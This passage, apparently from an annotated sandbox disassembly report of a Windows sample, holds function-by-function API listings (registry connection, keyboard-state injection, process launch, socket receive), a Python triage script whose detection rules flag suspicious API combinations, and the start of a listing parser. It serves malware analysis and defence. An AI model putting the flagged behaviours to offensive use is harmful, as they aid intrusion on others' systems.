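    "remote-registry": ({"RegConnectRegistryW"}, set()),
    "com-instantiation": ({"CoInitializeSecurity", "CoCreateInstanceEx"}, set()),
}


def triage(records: list[FunctionRecord]) -> list[tuple[str, str, list[str]]]:
    """Return (rule, opcode id prefix, matched APIs only reached via a subcall) per hit."""
    hits = []
    for rec in records:
        names = {api for api, _, _, _ in rec.apis}
        for label, (need_apis, need_strings) in RULES.items():
            if need_apis <= names and need_strings <= set(rec.strings):
                via_sub = sorted(api for api, _, sub, _ in rec.apis if sub and api in need_apis)
                hits.append((label, rec.opcode_id[:12], via_sub))
    return hits


if __name__ == "__main__":
    for label, opcode, via_sub in triage(parse_records(SAMPLE)):
        note = f" (via subcall: {', '.join(via_sub)})" if via_sub else ""
        print(f"{label}: opcode {opcode}{note}")
```

To run it over a whole report, paste the Execution Graph text into a file and pass its contents to `parse_records`; the Opcode ID prefix in each hit is what you search for on the page to land on the right function. Keep the subcall distinction in mind when reading hits: here the snapshot call is made by the helper at 00123C55, and only OpenProcess and TerminateProcess are the flagged function's own.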
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00123033
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 939e1059505d29e1bf5b08e3f2ea7478a81d85cb77190d19ef5fe0339b6f4d9c
                                                        • Instruction ID: 92d3578e6e0aa4a212e65c827568c81285537ca757630e59246705f6ffdd7b94
                                                        • Opcode Fuzzy Hash: 939e1059505d29e1bf5b08e3f2ea7478a81d85cb77190d19ef5fe0339b6f4d9c
                                                        • Instruction Fuzzy Hash: 95113D313883A6BEE7189B15FC42CAF77ACDF19320B10402AF914662C2DB785F5055B8
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00124312
                                                        • LoadStringW.USER32(00000000), ref: 00124319
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0012432F
                                                        • LoadStringW.USER32(00000000), ref: 00124336
                                                        • _wprintf.LIBCMT ref: 0012435C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0012437A
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00124357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 0a42ecca7f8212d340d6bccb3ce29061e1e071f1708cb8930ce6bf83a31f07a1
                                                        • Instruction ID: 4a83babcef7a5f07136b98b5975266d69daf759c63429834b00e397ee5c265d6
                                                        • Opcode Fuzzy Hash: 0a42ecca7f8212d340d6bccb3ce29061e1e071f1708cb8930ce6bf83a31f07a1
                                                        • Instruction Fuzzy Hash: 09018FF690021CBFE710D7A0DD89EE7776CEB08700F0001A9BB09E2122EA309EC64B70
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0014D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0014D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0014D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0014D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0014D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0014D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0014D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0014D77D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        • Opcode ID: b30319fda9ea672f77f9ffba2e0772f8f21bbbf112ae7fae80b31b06ccf5365d
                                                        • Instruction ID: 80b64ce673d5b9b4d53649330fa03e90773db5ede633d9a38f6a49d99fdbe582
                                                        • Opcode Fuzzy Hash: b30319fda9ea672f77f9ffba2e0772f8f21bbbf112ae7fae80b31b06ccf5365d
                                                        • Instruction Fuzzy Hash: 2AB1BA74600225EFDF18CF68D9857AD7BB1FF04715F098069EC489F6A9DB34A990CBA0
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013FDEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3479070676-0
                                                        • Opcode ID: 9ca8f6a6dbf0b2759fbc4a99ede17c3d6f13921e59f3b9afc20909d998841d25
                                                        • Instruction ID: 37746378dea052122317d6c5418af4ec21b293e8bfe14534b5ac42742f15dd9d
                                                        • Opcode Fuzzy Hash: 9ca8f6a6dbf0b2759fbc4a99ede17c3d6f13921e59f3b9afc20909d998841d25
                                                        • Instruction Fuzzy Hash: D7A16A716042019FCB14EF14C885FAEB7E5EF85314F14882DF9968B2A2DB31E94ACF52
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000C2ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 000C2B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000FC21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000FC1C7,00000004,00000000,00000000,00000000), ref: 000FC286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 5d06083f15857bc744f178ccb6382c492cc35642b89e6535ff6ffaa787bbe3c9
                                                        • Instruction ID: 95d57bd5fd69dc9f926272bc3fb09e1ae46efe89d1143d6a3aa0002c80237c1c
                                                        • Opcode Fuzzy Hash: 5d06083f15857bc744f178ccb6382c492cc35642b89e6535ff6ffaa787bbe3c9
                                                        • Instruction Fuzzy Hash: FA4129306046849BD7B99B288D8CF7F7BD2FB46310F15881DE14782EB1C775A892E712
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 001270DD
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00127114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00127130
                                                        • _memmove.LIBCMT ref: 0012717E
                                                        • _memmove.LIBCMT ref: 0012719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 001271AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001271BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 001271DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 5d3e9835ce1f45decdaffb5deef5dc01f5c988e23ce466d721bc7cc90551dc73
                                                        • Instruction ID: 10ce120a8c79fed5bee389f2c3e2cebbb12a31914199676fa645a896792201c7
                                                        • Opcode Fuzzy Hash: 5d3e9835ce1f45decdaffb5deef5dc01f5c988e23ce466d721bc7cc90551dc73
                                                        • Instruction Fuzzy Hash: C2318D35900205EFCB00DFA5DC85AABB7B8EF45710F1440B9F904AB256DB70DEA1CBA0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 001461EB
                                                        • GetDC.USER32(00000000), ref: 001461F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001461FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0014620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00146246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00146257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0014902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00146291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001462B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: a5b3efd7173740da5c2640cc17f685e71bb38b9e24e9e9c5c7b5d7ef3799f857
                                                        • Instruction ID: 1043c2f813eb74f02b4b539250ca07d9da1ceee40a72fa122d3abb3006d9c617
                                                        • Opcode Fuzzy Hash: a5b3efd7173740da5c2640cc17f685e71bb38b9e24e9e9c5c7b5d7ef3799f857
                                                        • Instruction Fuzzy Hash: 743141762012147FEB114F50CC8AFEB3BA9EF5A755F054065FE089A2A1C7B59C42CB64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 01c9d53946fa585d075ec97038f89374f666d2710fd80d7f9376473993154fe3
                                                        • Instruction ID: d316c49db479af3a6bbc371b3d0e473f49b441f5b001f7c9769622218846b559
                                                        • Opcode Fuzzy Hash: 01c9d53946fa585d075ec97038f89374f666d2710fd80d7f9376473993154fe3
                                                        • Instruction Fuzzy Hash: 652192B2609209BBE60C66129DC2FFF735D9E11388F044034FD04AAA87EB75DE5581E6
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • _wcstok.LIBCMT ref: 0012EC94
                                                        • _wcscpy.LIBCMT ref: 0012ED23
                                                        • _memset.LIBCMT ref: 0012ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: 8dd2e5d40c97897af7054123480223385a1544b4064eca0412c2c0220fd96262
                                                        • Instruction ID: 4dcf74598dfb51aae89af55276be0a4f1c54a12d4fa47aeb0fd12071423d0489
                                                        • Opcode Fuzzy Hash: 8dd2e5d40c97897af7054123480223385a1544b4064eca0412c2c0220fd96262
                                                        • Instruction Fuzzy Hash: 1DC147716083519FC724EF64D985EAEB7E4EF85310F00492DF8999B2A2DB30EC55CB82
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00136C00
                                                         • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00136C21 (WSOCK32 ordinal 17 is recvfrom; the last argument, 0x10, is sizeof(sockaddr_in) for the fromlen parameter)
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136C34
                                                        • htons.WSOCK32(?), ref: 00136CEA
                                                        • inet_ntoa.WSOCK32(?), ref: 00136CA7
                                                          • Part of subcall function 0011A7E9: _strlen.LIBCMT ref: 0011A7F3
                                                          • Part of subcall function 0011A7E9: _memmove.LIBCMT ref: 0011A815
                                                        • _strlen.LIBCMT ref: 00136D44
                                                        • _memmove.LIBCMT ref: 00136DAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 6f528788bfa6eed90e596174d15a9018f5e361398b04dea4bb27133693e74b9f
                                                        • Instruction ID: ed4069ebc1e9a68cf473b3107c2fdd7f8e6d5c3cb6ff5762c1d8623ce11b0515
                                                        • Opcode Fuzzy Hash: 6f528788bfa6eed90e596174d15a9018f5e361398b04dea4bb27133693e74b9f
                                                        • Instruction Fuzzy Hash: 1181CF71204200BBD714EB64CC86FAFB7A8AF94714F10892CF5959B2E2DB70ED41CB92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 459e00363f213fb3684a3c8f823d4e9a7d7277d0cc9805fdb626ca7b233f3911
                                                        • Instruction ID: 67502e0b349b7d6d27b465fa9a4dd41c6d12899ca9fea13921b55a0d3c0364a8
                                                        • Opcode Fuzzy Hash: 459e00363f213fb3684a3c8f823d4e9a7d7277d0cc9805fdb626ca7b233f3911
                                                        • Instruction Fuzzy Hash: 88716B34904109EFCB149F98CC48EFEBBB9FF86314F148159F915AA252C734AA52DFA0
                                                        APIs
                                                        • IsWindow.USER32(01444A18), ref: 0014B3EB
                                                        • IsWindowEnabled.USER32(01444A18), ref: 0014B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0014B4DB
                                                        • SendMessageW.USER32(01444A18,000000B0,?,?), ref: 0014B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0014B54F
                                                        • GetWindowLongW.USER32(01444A18,000000EC), ref: 0014B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0014B589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        • Opcode ID: bc52d0f30be959f45b4c720863ae87409641d9cf427b74de70cd815cef501bda
                                                        • Instruction ID: 36d391201bb937955a6f2d30d0dbf1509581fba38de47c64a3d3795586b36f74
                                                        • Opcode Fuzzy Hash: bc52d0f30be959f45b4c720863ae87409641d9cf427b74de70cd815cef501bda
                                                        • Instruction Fuzzy Hash: 27717D34609204EFDB249F95C8D4FBABBB9FF1A300F184059EA46972B2C731E951CB51
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013F448
                                                        • _memset.LIBCMT ref: 0013F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0013F556
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0013F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0013F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 05d35bbf3398eb77c0dc4f7a25a3a6883de74543583e706dc589b1f9a786291f
                                                        • Instruction ID: 6920b7fed95ca01f7fba8cfb103949ac14e82530fe49d8f4297915e5ca7b649c
                                                        • Opcode Fuzzy Hash: 05d35bbf3398eb77c0dc4f7a25a3a6883de74543583e706dc589b1f9a786291f
                                                        • Instruction Fuzzy Hash: D5616D75E006199FCF14DF64C885AAEBBB5FF49710F14806DE856AB362CB30AD46CB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00120F8C
                                                        • GetKeyboardState.USER32(?), ref: 00120FA1
                                                        • SetKeyboardState.USER32(?), ref: 00121002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00121030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0012104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00121095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001210B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 77f5b7435083fbb58761206f852199e53e9362f983781415c93788ad4fedbc5d
                                                        • Instruction ID: fd7ae59825a78040ebc896a115f16c914b70d1815d396eca34922f37933d6512
                                                        • Opcode Fuzzy Hash: 77f5b7435083fbb58761206f852199e53e9362f983781415c93788ad4fedbc5d
                                                        • Instruction Fuzzy Hash: 6D51F5605447E53EFB3682349C05BBABEA95B16304F084589F1D4858D3D3E4ECE5D751
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00120DA5
                                                        • GetKeyboardState.USER32(?), ref: 00120DBA
                                                        • SetKeyboardState.USER32(?), ref: 00120E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00120E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00120E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00120EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00120EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: d67d6452c434e385b897a334af997b9c318a26bcabc3ff9719a06dab89fcddd8
                                                        • Instruction ID: 94b51d936aa1b7e81804c49ab2493d5693b6e2a2a4bfdd6dbece2820330825b2
                                                        • Opcode Fuzzy Hash: d67d6452c434e385b897a334af997b9c318a26bcabc3ff9719a06dab89fcddd8
                                                        • Instruction Fuzzy Hash: CF51E4A05446E57EFB3783649C45BBABFA95B0A300F088A8DF1D4468C3C395ACE8D760
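The two PostMessageW entries above (WM_KEYUP 0x101 and WM_KEYDOWN 0x100 sent with the Shift, Ctrl, Alt and Win virtual-key codes after a GetKeyboardState/SetKeyboardState pair) and the WSOCK32 entry earlier in this section (an import by ordinal, #17) read more easily once the raw constants are decoded. The following Python is an added example for this page, not Joe Sandbox code or tooling: it parses lines in the listing's "APIs" format and decodes the ordinal, window-message and virtual-key values they carry. The sample entries are copied from this section, the constant tables are the documented Win32 values, and the ApiCall, parse_listing and releases_modifier_keys names are this example's own.

```python
"""Reader for the per-function 'APIs' lines of a Joe Sandbox disassembly listing.

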